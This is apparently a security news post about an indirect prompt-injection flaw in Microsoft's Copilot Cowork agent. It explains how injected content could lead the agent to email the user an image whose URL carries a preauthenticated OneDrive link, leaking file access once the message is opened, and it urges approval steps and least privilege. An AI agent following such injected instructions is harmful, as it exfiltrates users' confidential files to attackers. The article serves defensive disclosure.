Copilot Cowork Leaks OneDrive Files Through Prompt Injection

An AI agent that can send emails to your own inbox without asking permission sounds, in theory, like productivity. In practice, that same mechanism became a file exfiltration vector in Microsoft Copilot Cowork, the AI-assisted collaboration product Microsoft launched in March 2026. The issue was publicly documented on May 26 by Simon Willison on his blog, with the original technical analysis published by Prompt Armor.

What Happened

Copilot Cowork allows AI agents to send messages to the user's mailbox as part of automated workflows. The problem: those messages could contain external images whose loading triggered network requests to attacker-controlled domains. Since OneDrive can generate preauthenticated download links, a well-crafted prompt injection could cause one of those links to end up embedded in an image URL. When the user opened the email, the mail client loaded the image, and the attacker's server received the link with direct file access.

The entire flow required no suspicious user clicks or attachment downloads. Simply opening the message the agent had sent was enough.

Why This Case Represents a Broader Problem

This incident is not an isolated case of poor implementation: it illustrates a structural tension in agentic system design. When an agent has permissions to act (send emails, create links, access storage) without requiring human confirmation at each step, the blast radius of a prompt injection attack expands considerably.

Indirect prompt injection works here in textbook fashion: a document or message the agent processes contains malicious instructions that redirect its behavior. The agent cannot distinguish between legitimate system instructions and adversarial content embedded in the data it handles. The novelty is that the exfiltration channel (an external image in a rendered email) is completely passive from the user's perspective.

As Willison points out, the core challenge in agentic system design remains exactly this: preventing attackers from exploiting the agent's permissions to move data outside the controlled environment.

Who This Affects

The issue primarily impacts organizations that have adopted Copilot Cowork in environments with sensitive data in OneDrive: legal teams, finance, HR, or any department where corporate documents have value to an external attacker. This is not theoretical risk confined to lab scenarios; the attack is executable by anyone who can introduce malicious content into the agent's workflow, whether through a received email, a shared document, or a delegated task.

Security teams evaluating or already deploying Microsoft's agentic tools should review what permissions their agents have to generate and send communications without explicit approval, and how the email client renders AI-generated content.

What Should Change

The Prompt Armor analysis points in the right direction: agents operating with access to sensitive storage should not be able to generate preauthenticated links or send external communications without a human approval step. Rendering external images in agent-generated messages is, at this point, a known risk that should be blocked by default.

From ElephantPink, we have been emphasizing for months that the agent permissions model needs the same rigor applied to third-party APIs: least privilege, explicit approval for actions with external effects, and audit trails of what the agent has generated. This Copilot Cowork case is a reminder that operational convenience and security still pull in opposite directions, and that no provider has fully resolved that equation yet.

Copilot Cowork Leaks OneDrive Files Through Prompt Injection

What Happened

Why This Case Represents a Broader Problem

Who This Affects

What Should Change

Sources

Read next

Cursor pushes into India with local pricing before SpaceX deal

Brain waves: the next data source physical AI is chasing

Moonshot AI's Kimi and Silicon Valley's new bout of nerves